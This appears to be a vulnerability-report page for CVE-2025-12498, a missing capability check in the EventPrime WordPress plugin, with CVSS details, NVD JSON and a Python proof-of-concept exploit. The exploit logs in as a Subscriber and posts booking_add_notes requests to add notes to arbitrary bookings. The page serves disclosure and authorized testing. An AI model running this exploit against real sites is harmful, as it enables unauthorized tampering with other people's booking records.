Security Vulnerability Report
中文
CVE-2025-12498 CVSS 4.3 MEDIUM

CVE-2025-12498

Published: 2025-11-08 07:15:36
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized booking note creation due to a missing capability check on the 'booking_add_notes' function in all versions up to, and including, 4.2.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add a note to the backend view of any booking.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

EventPrime – Events Calendar, Bookings and Tickets < 4.2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12498 PoC - EventPrime Unauthorized Booking Note Addition # Author: Security Researcher # Target: WordPress with EventPrime plugin <= 4.2.0.0 import requests import sys from urllib.parse import urlencode def exploit_unauthorized_booking_note(target_url, username, password, booking_id, note_content): """ Exploits CVE-2025-12498: Missing authorization check in booking_add_notes function Args: target_url: Base URL of the WordPress site username: WordPress username with Subscriber+ role password: WordPress password booking_id: Target booking ID to add note to note_content: Malicious note content to inject Returns: bool: True if exploitation appears successful, False otherwise """ session = requests.Session() # Step 1: Login to WordPress to obtain authentication cookies login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } login_response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies.get_dict()): print("[-] Login failed. Check credentials.") return False print("[+] Login successful. Subscriber-level account authenticated.") # Step 2: Exploit the vulnerability by sending malicious booking note request ajax_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'booking_add_notes', 'booking_id': booking_id, 'notes': note_content, 'ep_ajax_call': 'true', 'security': 'dummy' # In vulnerable version, security check is missing } exploit_response = session.post(ajax_url, data=exploit_data) # Step 3: Analyze response if exploit_response.status_code == 200: try: response_json = exploit_response.json() if response_json.get('success') or 'note added' in str(response_json).lower(): print(f"[+] VULNERABLE! Successfully added note to booking #{booking_id}") print(f"[+] Note content: {note_content}") print("[+] Attacker can now modify any booking's notes without proper authorization.") return True except: pass if '1' in exploit_response.text or 'success' in exploit_response.text.lower(): print(f"[+] VULNERABLE! Successfully added note to booking #{booking_id}") return True print("[-] Exploitation failed or target is patched.") return False if __name__ == "__main__": if len(sys.argv) < 6: print("Usage: python cve-2025-12498_poc.py <target_url> <username> <password> <booking_id> <note>") print("Example: python cve-2025-12498_poc.py http://example.com subscriber password 123 'Malicious note'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] bid = sys.argv[4] note = sys.argv[5] exploit_unauthorized_booking_note(target, user, pwd, bid, note)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12498", "sourceIdentifier": "[email protected]", "published": "2025-11-08T07:15:36.387", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized booking note creation due to a missing capability check on the 'booking_add_notes' function in all versions up to, and including, 4.2.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add a note to the backend view of any booking."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-ep-ajax.php#L638", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3389496/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d32f7e98-8203-400e-bc26-4556ddba2510?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.